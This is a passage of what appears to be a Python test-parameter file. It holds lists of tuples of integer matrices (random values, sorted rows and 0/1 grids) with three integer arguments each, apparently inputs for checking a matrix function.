([[37, 36, 46, 54, 59, 38, 5, 91, 97, 28, 88, 14, 71, 52, 71, 38, 62, 81, 19, 41, 19, 28, 42, 29, 19], [10, 82, 70, 27, 5, 9, 26, 78, 21, 71, 40, 27, 18, 75, 92, 49, 94, 39, 30, 12, 38, 13, 89, 19, 42], [23, 28, 28, 44, 55, 87, 49, 69, 37, 58, 6, 83, 75, 54, 80, 85, 62, 55, 2, 53, 75, 7, 65, 66, 16], [3, 84, 78, 20, 78, 29, 38, 84, 2, 24, 46, 84, 28, 34, 96, 14, 43, 13, 14, 63, 65, 35, 14, 12, 36], [78, 75, 60, 86, 45, 47, 55, 18, 55, 50, 99, 1, 85, 21, 6, 21, 76, 85, 55, 75, 97, 5, 70, 1, 59], [71, 65, 92, 91, 32, 85, 43, 5, 77, 47, 38, 76, 70, 67, 57, 16, 31, 74, 61, 51, 67, 47, 26, 80, 32], [29, 50, 99, 33, 47, 29, 34, 12, 53, 93, 63, 87, 76, 5, 95, 94, 6, 41, 8, 54, 25, 44, 53, 67, 31], [28, 55, 3, 82, 19, 68, 11, 87, 33, 99, 74, 71, 30, 45, 8, 92, 57, 14, 67, 83, 4, 14, 32, 98, 54], [73, 86, 44, 26, 40, 12, 73, 81, 24, 12, 68, 3, 88, 96, 59, 69, 70, 89, 34, 91, 23, 32, 25, 57, 97], [59, 2, 66, 32, 52, 39, 59, 31, 60, 36, 79, 94, 36, 69, 90, 50, 68, 45, 35, 48, 50, 91, 75, 48, 17], [27, 42, 95, 7, 3, 77, 3, 36, 73, 65, 43, 49, 87, 79, 87, 39, 33, 4, 75, 80, 48, 23, 52, 15, 4], [34, 98, 83, 15, 26, 65, 83, 18, 33, 90, 87, 98, 79, 36, 47, 26, 88, 42, 49, 73, 96, 84, 69, 73, 41], [30, 91, 12, 61, 1, 28, 66, 48, 58, 49, 82, 68, 31, 63, 42, 64, 72, 99, 66, 27, 93, 97, 98, 25, 83], [14, 66, 57, 58, 89, 54, 65, 94, 87, 90, 14, 91, 41, 87, 42, 73, 94, 46, 65, 21, 20, 76, 91, 11, 1], [54, 41, 37, 8, 21, 35, 29, 89, 9, 32, 90, 86, 22, 81, 57, 92, 85, 8, 3, 77, 16, 96, 73, 59, 36], [94, 25, 80, 39, 57, 56, 88, 46, 79, 74, 14, 85, 97, 17, 65, 26, 35, 80, 12, 2, 72, 84, 12, 28, 36], [7, 82, 61, 53, 20, 62, 56, 64, 93, 29, 28, 17, 34, 9, 99, 62, 55, 60, 94, 72, 3, 56, 38, 30, 68], [32, 37, 47, 37, 79, 34, 27, 92, 85, 42, 12, 41, 57, 88, 49, 93, 77, 64, 78, 89, 10, 31, 81, 3, 18], [73, 86, 76, 80, 29, 53, 23, 25, 97, 20, 49, 96, 12, 43, 41, 55, 83, 48, 24, 79, 51, 72, 72, 16, 44], [35, 69, 45, 71, 40, 46, 53, 15, 60, 58, 31, 77, 59, 70, 7, 37, 24, 7, 30, 90, 19, 34, 82, 58, 
61], [92, 8, 73, 52, 16, 68, 69, 12, 18, 55, 74, 52, 14, 75, 40, 89, 15, 68, 43, 10, 40, 38, 87, 83, 41], [70, 45, 63, 22, 59, 29, 56, 94, 20, 2, 58, 10, 13, 1, 95, 9, 92, 90, 77, 78, 17, 63, 76, 29, 66], [46, 33, 15, 28, 85, 88, 31, 95, 71, 91, 41, 16, 85, 14, 66, 18, 11, 21, 31, 12, 78, 61, 91, 80, 90], [35, 54, 35, 42, 80, 95, 91, 20, 64, 12, 91, 43, 87, 9, 38, 75, 16, 1, 2, 44, 70, 58, 73, 54, 46], [46, 43, 27, 4, 11, 51, 58, 70, 39, 63, 4, 17, 42, 52, 93, 51, 11, 78, 50, 34, 25, 46, 61, 14, 62]],20,18,19,)
]
filled_function_param = [
([[16, 25, 26, 30, 34, 42, 51, 57, 69, 80], [15, 24, 29, 30, 31, 50, 55, 60, 71, 83], [6, 16, 22, 28, 34, 56, 61, 86, 88, 89], [14, 22, 24, 25, 26, 48, 73, 76, 78, 88], [2, 2, 12, 28, 28, 67, 68, 80, 81, 83], [8, 18, 27, 41, 62, 76, 77, 89, 94, 98], [9, 36, 41, 44, 47, 49, 76, 91, 92, 92], [18, 19, 27, 28, 29, 31, 43, 73, 93, 95], [32, 44, 59, 66, 70, 79, 88, 93, 94, 98], [12, 25, 29, 32, 37, 63, 71, 78, 82, 95]],7,5,8,),
([[-38]],0,0,0,),
([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1]],12,15,12,),
([[68, 97, 94, 63, 48, 25, 30, 82, 73, 97, 42, 31, 9, 59, 43, 91, 55, 60, 65, 83, 19, 21, 47, 80, 9, 30, 12, 53, 31, 96, 37, 21, 5], [62, 34, 83, 77, 34, 35, 41, 14, 24, 18, 14, 76, 55, 36, 73, 3, 51, 81, 90, 88, 3, 7, 79, 51, 42, 14, 65, 39, 45, 79, 47, 74, 92], [78, 98, 95, 41, 33, 99, 51, 12, 70, 31, 41, 1, 75, 58, 29, 98, 97, 9, 87, 49, 56, 97, 8, 86, 56, 94, 88, 31, 99, 99, 8, 16, 27], [79, 45, 86, 35, 35, 95, 56, 1, 27, 66, 74, 95, 8, 49, 70, 90, 24, 3, 2, 87, 21, 84, 79, 42, 48, 22, 46, 35, 69, 55, 66, 22, 57], [54, 64, 52, 77, 96, 11, 11, 11, 77, 64, 13, 83, 34, 10, 78, 98, 89, 32, 21, 69, 8, 21, 83, 60, 53, 61, 85, 32, 16, 90, 53, 70, 5], [57, 48, 60, 88, 88, 63, 13, 12, 96, 91, 41, 24, 12, 57, 41, 80, 77, 5, 93, 98, 67, 71, 72, 8, 61, 23, 2, 98, 71, 8, 55, 84, 33], [84, 13, 33, 28, 81, 75, 60, 73, 25, 7, 26, 75, 90, 44, 3, 43, 20, 93, 58, 93, 99, 73, 89, 66, 93, 25, 14, 12, 68, 48, 90, 49, 54], [68, 70, 22, 76, 53, 91, 22, 91, 37, 2, 39, 87, 8, 2, 23, 88, 26, 52, 87, 61, 51, 91, 76, 9, 1, 51, 26, 88, 38, 97, 93, 19, 40], [11, 38, 60, 75, 89, 11, 5, 66, 67, 24, 38, 53, 92, 73, 26, 9, 37, 17, 34, 30, 38, 61, 20, 26, 41, 71, 4, 98, 40, 92, 5, 50, 92], [2, 14, 54, 67, 28, 40, 91, 98, 46, 78, 31, 41, 24, 44, 11, 16, 34, 42, 49, 21, 82, 55, 52, 42, 82, 76, 47, 1, 18, 32, 58, 97, 13], [51, 79, 86, 84, 72, 9, 22, 35, 8, 27, 61, 56, 15, 39, 2, 66, 34, 63, 46, 29, 37, 3, 76, 61, 98, 58, 53, 91, 32, 10, 89, 96, 88], [67, 93, 71, 25, 11, 64, 81, 11, 55, 42, 65, 72, 33, 49, 73, 81, 27, 49, 68, 15, 99, 81, 92, 89, 14, 98, 77, 1, 7, 45, 35, 25, 86], [44, 33, 37, 61, 82, 71, 26, 70, 71, 76, 9, 51, 99, 55, 8, 73, 40, 12, 78, 40, 60, 54, 9, 17, 90, 32, 5, 24, 43, 73, 29, 23, 46], [74, 40, 32, 49, 88, 92, 42, 22, 64, 80, 29, 37, 8, 39, 52, 71, 34, 45, 69, 44, 23, 37, 50, 27, 67, 63, 2, 64, 76, 22, 83, 44, 74], [75, 7, 37, 31, 54, 60, 18, 20, 61, 53, 71, 11, 15, 72, 7, 1, 27, 41, 62, 46, 35, 5, 3, 53, 62, 5, 40, 31, 56, 84, 95, 82, 1], [82, 2, 45, 21, 88, 83, 70, 39, 68, 83, 
46, 49, 91, 3, 93, 98, 63, 25, 27, 43, 50, 43, 47, 62, 62, 7, 38, 72, 57, 48, 99, 64, 46], [45, 38, 98, 12, 57, 98, 34, 44, 73, 7, 27, 97, 79, 51, 36, 10, 76, 14, 19, 7, 31, 19, 86, 99, 39, 78, 44, 13, 37, 35, 44, 37, 91], [61, 70, 68, 52, 18, 25, 86, 19, 3, 28, 2, 35, 82, 40, 38, 57, 55, 2, 6, 98, 73, 68, 96, 98, 21, 72, 2, 8, 48, 13, 96, 36, 25], [99, 25, 21, 80, 47, 21, 29, 49, 24, 99, 40, 57, 59, 36, 13, 65, 15, 56, 45, 32, 97, 68, 71, 7, 19, 54, 1, 19, 38, 85, 28, 65, 98], [38, 93, 22, 1, 1, 79, 75, 87, 39, 49, 15, 66, 97, 98, 40, 73, 33, 78, 77, 27, 60, 45, 55, 89, 10, 93, 72, 78, 40, 40, 64, 59, 62], [87, 55, 14, 80, 62, 56, 91, 80, 1, 16, 60, 84, 55, 34, 38, 92, 1, 70, 67, 68, 93, 81, 73, 56, 35, 90, 73, 87, 33, 87, 55, 99, 99], [26, 75, 52, 1, 78, 3, 57, 85, 36, 21, 18, 51, 26, 30, 45, 95, 24, 97, 75, 68, 36, 93, 92, 37, 88, 43, 37, 29, 94, 83, 96, 38, 65], [98, 30, 29, 8, 74, 61, 86, 22, 14, 49, 93, 47, 66, 4, 7, 39, 58, 62, 32, 95, 34, 23, 65, 9, 21, 47, 45, 44, 12, 98, 91, 92, 28], [37, 35, 69, 31, 40, 54, 30, 30, 37, 4, 17, 33, 24, 75, 25, 84, 59, 66, 96, 92, 87, 56, 48, 16, 32, 89, 39, 44, 30, 73, 24, 48, 47], [83, 82, 6, 7, 25, 91, 38, 58, 10, 20, 79, 35, 18, 7, 87, 56, 31, 51, 15, 98, 22, 29, 61, 2, 12, 78, 7, 91, 77, 63, 87, 87, 18], [35, 75, 62, 70, 16, 58, 92, 60, 32, 16, 24, 9, 78, 25, 76, 54, 75, 16, 50, 2, 19, 69, 29, 92, 34, 59, 58, 12, 94, 45, 62, 89, 12], [14, 83, 42, 74, 93, 58, 96, 94, 25, 30, 81, 26, 47, 36, 26, 8, 33, 70, 94, 96, 99, 64, 96, 25, 36, 88, 49, 39, 60, 6, 43, 24, 65], [52, 96, 76, 29, 65, 68, 26, 21, 13, 75, 49, 52, 47, 10, 16, 97, 51, 87, 73, 86, 5, 99, 48, 40, 27, 37, 58, 60, 1, 49, 2, 26, 48], [22, 81, 11, 10, 42, 96, 27, 51, 69, 8, 92, 12, 41, 93, 75, 30, 18, 12, 98, 4, 61, 6, 43, 55, 72, 41, 92, 91, 49, 21, 74, 49, 5], [97, 63, 36, 47, 3, 35, 51, 12, 85, 90, 99, 2, 37, 31, 19, 1, 25, 52, 61, 37, 60, 11, 37, 35, 53, 17, 95, 77, 12, 42, 41, 71, 30], [77, 40, 69, 61, 43, 22, 79, 66, 52, 28, 34, 37, 19, 26, 51, 17, 13, 79, 
38, 87, 63, 98, 24, 15, 99, 70, 85, 63, 2, 78, 6, 9, 13], [18, 86, 88, 50, 35, 77, 66, 32, 72, 8, 54, 10, 11, 64, 35, 22, 50, 43, 58, 28, 61, 9, 47, 33, 92, 64, 69, 38, 1, 73, 77, 49, 58], [84, 47, 49, 83, 59, 14, 86, 10, 76, 62, 25, 16, 59, 72, 45, 41, 52, 24, 90, 18, 44, 73, 56, 69, 30, 79, 90, 4, 33, 27, 72, 87, 37]],18,17,20,),
([[-20, -14, 14, 84], [-34, -24, 46, 96], [18, 36, 66, 80], [-32, 28, 58, 94]],3,3,3,),
([[0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1], [0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0], [1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1], [1, 0, 0, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0], [0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1], [1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1], [1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1], [1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0], [0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 0], [0, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0], [1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0], [1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1], [1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0], [0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1], [1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1], [1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 1, 0], [0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0, 0, 1, 0], [0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1, 1, 0, 1, 0, 0, 1, 1, 1], [0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0], [1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 0, 0, 1], [1, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0], [1, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0], [1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0], [0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 0, 1, 0], [0, 
1, 1, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1], [0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 1], [0, 0, 0, 1, 0, 1, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0]],14,25,17,),
([[2, 3, 4, 9, 11, 11, 11, 12, 15, 15, 19, 20, 20, 23, 24, 25, 29, 29, 29, 33, 34, 38, 41, 41, 44, 46, 48, 54, 54, 58, 60, 61, 62, 62, 62, 68, 68, 72, 73, 79, 79, 80, 83, 86, 92, 99, 99], [3, 3, 4, 4, 4, 6, 12, 16, 17, 17, 18, 18, 18, 19, 19, 21, 25, 28, 29, 30, 30, 32, 35, 38, 39, 42, 50, 53, 61, 65, 65, 65, 70, 71, 75, 80, 81, 84, 84, 89, 92, 92, 95, 95, 96, 98, 99], [2, 4, 7, 9, 10, 14, 17, 21, 22, 23, 24, 28, 29, 31, 31, 33, 33, 37, 37, 38, 39, 41, 42, 42, 45, 48, 48, 58, 60, 62, 63, 66, 73, 73, 75, 76, 76, 80, 83, 85, 86, 86, 91, 94, 99, 99, 99], [1, 1, 3, 6, 6, 6, 8, 12, 16, 17, 18, 24, 25, 27, 30, 33, 35, 39, 39, 41, 45, 48, 50, 50, 53, 53, 53, 55, 56, 57, 58, 60, 64, 69, 71, 73, 73, 74, 76, 78, 82, 84, 85, 93, 94, 98, 99], [1, 1, 4, 7, 9, 9, 14, 14, 16, 16, 19, 24, 24, 25, 25, 27, 28, 28, 30, 32, 34, 34, 36, 37, 38, 39, 41, 41, 45, 47, 54, 56, 57, 63, 66, 67, 71, 72, 79, 82, 83, 83, 83, 91, 92, 97, 97], [5, 8, 8, 9, 9, 14, 15, 18, 18, 22, 22, 24, 25, 25, 28, 28, 29, 29, 36, 38, 50, 56, 62, 63, 69, 69, 69, 70, 70, 70, 70, 74, 76, 80, 80, 84, 85, 87, 89, 89, 89, 89, 96, 97, 97, 98, 98], [1, 3, 6, 6, 8, 9, 10, 11, 14, 16, 20, 21, 21, 26, 27, 27, 29, 30, 37, 37, 38, 43, 43, 47, 47, 47, 48, 50, 51, 52, 53, 59, 59, 60, 61, 65, 65, 67, 71, 71, 78, 83, 87, 88, 88, 90, 99], [1, 1, 3, 6, 7, 8, 8, 13, 13, 14, 14, 17, 17, 18, 20, 25, 28, 29, 29, 30, 31, 33, 34, 38, 40, 43, 49, 50, 53, 56, 61, 62, 63, 64, 69, 70, 75, 81, 85, 88, 90, 91, 93, 93, 94, 95, 97], [1, 4, 5, 6, 6, 6, 6, 7, 10, 13, 13, 16, 21, 25, 26, 27, 32, 32, 33, 37, 37, 40, 43, 45, 47, 50, 51, 52, 53, 56, 58, 60, 61, 61, 67, 70, 75, 78, 82, 83, 85, 85, 86, 90, 92, 94, 94], [3, 5, 5, 5, 10, 10, 12, 14, 15, 16, 19, 20, 27, 29, 30, 32, 39, 40, 40, 40, 46, 49, 50, 53, 56, 58, 59, 59, 59, 59, 61, 65, 68, 76, 80, 83, 83, 85, 86, 87, 88, 89, 89, 89, 91, 93, 95], [2, 2, 7, 10, 10, 11, 11, 12, 15, 18, 21, 23, 24, 26, 27, 30, 32, 33, 33, 34, 35, 35, 35, 36, 38, 39, 40, 41, 41, 43, 43, 45, 50, 51, 56, 60, 62, 73, 74, 
76, 76, 79, 87, 89, 89, 90, 99], [2, 3, 8, 10, 10, 15, 15, 15, 22, 22, 25, 26, 28, 28, 29, 32, 34, 36, 36, 37, 39, 39, 40, 41, 44, 46, 47, 54, 55, 58, 67, 69, 69, 70, 70, 71, 72, 84, 84, 85, 89, 91, 93, 96, 96, 97, 98], [2, 5, 6, 6, 12, 12, 17, 18, 19, 19, 21, 22, 27, 37, 37, 38, 40, 41, 50, 53, 54, 57, 58, 61, 62, 63, 64, 70, 71, 72, 72, 72, 77, 77, 79, 80, 84, 88, 90, 91, 93, 97, 97, 98, 98, 99, 99], [1, 1, 2, 5, 9, 12, 14, 18, 18, 18, 19, 20, 21, 26, 27, 36, 37, 40, 41, 43, 46, 46, 47, 48, 51, 51, 53, 54, 59, 63, 67, 67, 68, 69, 74, 74, 74, 77, 80, 81, 83, 83, 83, 86, 90, 92, 99], [4, 4, 9, 9, 9, 9, 11, 11, 12, 12, 18, 18, 19, 25, 26, 26, 27, 27, 30, 33, 33, 35, 42, 42, 43, 45, 47, 47, 50, 51, 52, 55, 57, 61, 67, 70, 70, 70, 72, 73, 77, 78, 81, 82, 84, 91, 96], [2, 3, 5, 5, 5, 8, 11, 12, 12, 13, 17, 23, 27, 28, 30, 33, 34, 35, 36, 40, 40, 42, 42, 42, 45, 47, 51, 51, 52, 52, 64, 65, 71, 72, 76, 80, 80, 85, 87, 87, 88, 93, 94, 96, 97, 97, 98], [4, 12, 13, 15, 16, 17, 19, 20, 23, 23, 25, 32, 34, 34, 35, 37, 37, 40, 40, 41, 48, 53, 54, 59, 59, 61, 62, 63, 65, 65, 67, 71, 72, 74, 79, 79, 81, 82, 83, 84, 85, 87, 87, 91, 92, 93, 98], [3, 5, 9, 10, 14, 15, 19, 21, 24, 26, 30, 33, 37, 39, 44, 46, 46, 47, 53, 53, 54, 55, 56, 56, 57, 58, 66, 71, 72, 72, 73, 74, 76, 77, 80, 81, 83, 85, 88, 91, 92, 95, 96, 97, 97, 97, 98], [2, 8, 8, 8, 9, 11, 12, 17, 25, 25, 26, 26, 27, 33, 38, 39, 39, 41, 41, 44, 44, 45, 46, 46, 48, 50, 51, 53, 57, 61, 65, 67, 69, 77, 77, 79, 81, 82, 83, 84, 85, 88, 90, 91, 96, 97, 97], [2, 5, 7, 13, 15, 16, 21, 33, 34, 36, 37, 39, 40, 43, 45, 46, 47, 51, 51, 54, 55, 59, 62, 69, 70, 71, 71, 71, 72, 74, 75, 75, 76, 78, 78, 80, 81, 82, 82, 83, 84, 87, 88, 88, 91, 97, 98], [3, 4, 7, 9, 10, 10, 10, 11, 14, 15, 15, 16, 17, 18, 19, 22, 26, 27, 30, 40, 42, 43, 44, 46, 47, 48, 52, 54, 57, 59, 63, 64, 65, 66, 69, 72, 73, 73, 78, 78, 79, 81, 86, 87, 90, 91, 92], [2, 4, 10, 10, 12, 14, 19, 21, 23, 24, 28, 30, 32, 35, 38, 38, 39, 40, 42, 44, 45, 49, 55, 55, 55, 56, 57, 
61, 66, 70, 71, 74, 78, 80, 80, 81, 81, 82, 82, 82, 83, 84, 84, 85, 90, 93, 94], [3, 8, 9, 13, 14, 14, 18, 18, 22, 24, 24, 25, 29, 29, 35, 36, 36, 37, 38, 39, 40, 43, 44, 44, 46, 55, 57, 61, 62, 63, 67, 67, 69, 72, 72, 74, 74, 79, 79, 84, 85, 87, 88, 89, 92, 96, 97], [1, 1, 9, 10, 10, 16, 17, 20, 29, 30, 32, 35, 36, 37, 40, 41, 41, 42, 43, 43, 46, 53, 54, 58, 58, 59, 60, 60, 60, 67, 68, 69, 71, 73, 76, 80, 80, 82, 85, 85, 85, 89, 95, 96, 96, 97, 97], [1, 5, 6, 7, 9, 13, 14, 18, 20, 21, 26, 27, 31, 31, 34, 37, 39, 43, 45, 45, 45, 48, 51, 52, 54, 58, 61, 62, 64, 65, 69, 70, 70, 73, 75, 76, 80, 82, 83, 87, 88, 90, 90, 90, 93, 94, 96], [3, 5, 15, 15, 15, 16, 19, 20, 25, 26, 27, 30, 31, 31, 33, 34, 35, 37, 37, 49, 52, 55, 56, 59, 59, 62, 63, 63, 69, 70, 71, 72, 73, 76, 77, 78, 80, 81, 83, 86, 88, 90, 91, 92, 93, 94, 96], [3, 4, 6, 7, 8, 19, 19, 22, 24, 24, 28, 28, 33, 35, 38, 39, 42, 47, 47, 47, 48, 49, 50, 52, 53, 55, 57, 59, 60, 67, 70, 79, 79, 80, 80, 81, 83, 84, 85, 86, 88, 88, 89, 93, 94, 95, 96], [2, 3, 3, 5, 6, 7, 9, 9, 11, 13, 14, 16, 16, 17, 21, 23, 25, 28, 29, 33, 34, 37, 39, 42, 43, 50, 52, 56, 56, 56, 57, 58, 62, 69, 71, 74, 76, 76, 79, 82, 85, 85, 90, 94, 94, 95, 97], [9, 11, 23, 26, 27, 28, 30, 30, 32, 33, 33, 33, 34, 36, 37, 45, 46, 46, 46, 46, 46, 49, 51, 51, 52, 56, 61, 61, 62, 63, 64, 66, 67, 70, 76, 76, 80, 85, 86, 91, 91, 92, 93, 94, 97, 98, 99], [2, 3, 3, 4, 6, 6, 10, 11, 12, 15, 17, 18, 18, 18, 19, 20, 22, 24, 24, 28, 31, 32, 33, 35, 35, 36, 39, 40, 44, 50, 55, 59, 61, 65, 66, 67, 70, 72, 74, 78, 78, 82, 83, 91, 92, 94, 97], [1, 3, 7, 11, 13, 13, 16, 19, 19, 21, 22, 24, 26, 29, 29, 30, 30, 41, 43, 44, 47, 52, 58, 59, 59, 60, 60, 60, 66, 67, 68, 70, 73, 77, 79, 85, 85, 86, 87, 88, 90, 91, 93, 95, 97, 98, 99], [1, 1, 3, 4, 4, 4, 6, 7, 8, 8, 11, 11, 12, 13, 18, 21, 23, 23, 23, 25, 25, 26, 27, 40, 40, 48, 49, 53, 56, 58, 59, 60, 62, 62, 64, 66, 69, 80, 82, 84, 88, 88, 90, 91, 93, 97, 98], [4, 4, 5, 6, 8, 9, 12, 14, 16, 19, 24, 29, 30, 35, 36, 36, 38, 
40, 41, 42, 42, 45, 54, 58, 59, 60, 62, 65, 65, 66, 68, 69, 71, 76, 78, 80, 81, 82, 83, 87, 87, 88, 89, 90, 93, 94, 98], [1, 2, 4, 5, 5, 6, 7, 10, 17, 19, 21, 26, 30, 32, 33, 33, 34, 37, 40, 43, 44, 47, 48, 48, 54, 56, 56, 56, 57, 62, 64, 65, 67, 69, 76, 78, 80, 82, 83, 84, 86, 90, 93, 93, 93, 94, 99], [3, 4, 7, 7, 13, 15, 17, 18, 22, 24, 25, 25, 26, 27, 28, 33, 35, 36, 41, 45, 47, 47, 50, 52, 53, 54, 57, 57, 59, 62, 65, 73, 73, 75, 75, 76, 77, 78, 78, 79, 79, 79, 81, 82, 83, 90, 99], [3, 6, 12, 15, 17, 17, 22, 22, 22, 23, 26, 27, 27, 31, 34, 35, 46, 52, 54, 55, 56, 58, 61, 61, 62, 63, 64, 65, 65, 71, 72, 73, 77, 79, 79, 81, 81, 82, 87, 89, 91, 91, 94, 95, 96, 97, 97], [2, 4, 8, 12, 13, 15, 16, 18, 22, 22, 23, 24, 24, 26, 26, 26, 31, 32, 33, 35, 37, 38, 38, 38, 49, 49, 51, 53, 54, 55, 57, 64, 64, 67, 74, 75, 79, 80, 83, 84, 84, 85, 86, 87, 88, 92, 99], [2, 4, 4, 4, 5, 13, 15, 17, 18, 21, 21, 22, 23, 24, 28, 28, 30, 31, 34, 35, 35, 36, 41, 44, 44, 46, 47, 58, 59, 62, 63, 64, 66, 67, 67, 69, 70, 74, 81, 82, 84, 87, 89, 91, 92, 94, 97], [3, 3, 4, 6, 8, 10, 13, 13, 16, 16, 16, 16, 21, 30, 32, 32, 33, 33, 35, 40, 44, 45, 46, 46, 47, 47, 51, 62, 63, 65, 66, 70, 74, 75, 76, 78, 81, 82, 84, 85, 87, 87, 89, 90, 99, 99, 99], [2, 4, 5, 6, 6, 8, 9, 14, 15, 16, 18, 18, 18, 19, 19, 21, 23, 23, 23, 27, 27, 28, 29, 31, 37, 38, 38, 39, 40, 42, 47, 51, 54, 61, 70, 76, 79, 82, 83, 90, 90, 91, 92, 93, 95, 96, 97], [3, 3, 4, 7, 8, 8, 9, 10, 11, 14, 16, 19, 20, 21, 21, 29, 31, 37, 38, 40, 47, 50, 52, 53, 53, 54, 57, 59, 64, 65, 67, 67, 68, 73, 75, 82, 83, 84, 85, 87, 88, 91, 92, 92, 92, 94, 95], [4, 4, 4, 6, 9, 14, 15, 16, 17, 19, 25, 29, 29, 31, 33, 33, 34, 38, 38, 42, 42, 42, 43, 44, 46, 47, 52, 52, 53, 54, 61, 61, 63, 66, 68, 69, 71, 73, 75, 80, 86, 91, 92, 93, 96, 98, 99], [2, 2, 8, 8, 9, 10, 10, 12, 13, 15, 15, 22, 24, 25, 26, 30, 35, 38, 38, 40, 40, 42, 52, 54, 57, 58, 60, 63, 63, 63, 64, 64, 66, 70, 72, 72, 73, 77, 77, 80, 83, 87, 87, 88, 89, 90, 95], [3, 4, 4, 5, 6, 6, 8, 9, 12, 
